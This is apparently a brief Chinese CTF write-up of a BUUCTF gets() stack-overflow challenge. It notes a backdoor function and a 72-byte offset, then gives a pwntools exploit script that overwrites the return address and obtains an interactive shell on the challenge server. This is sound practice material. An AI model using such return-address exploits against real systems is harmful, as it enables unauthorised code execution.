Gets 栈溢出

Gets 栈溢出

话不多说,直接上题(BUUCTF)

Gets 栈溢出-侠者安全社区

IDA64 反编译

Gets 栈溢出-侠者安全社区

给出了后门函数

Gets 栈溢出-侠者安全社区

看内存溢出大小是 72

Gets 栈溢出-侠者安全社区

构造 payload

from pwn import *

p = remote("node5.buuoj.cn", 27079)

payload = b'a' * 72 + p64(0x40060D)

p.sendline(payload)
p.interactive()

拿到 flag

 

© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情快捷回复

    暂无评论内容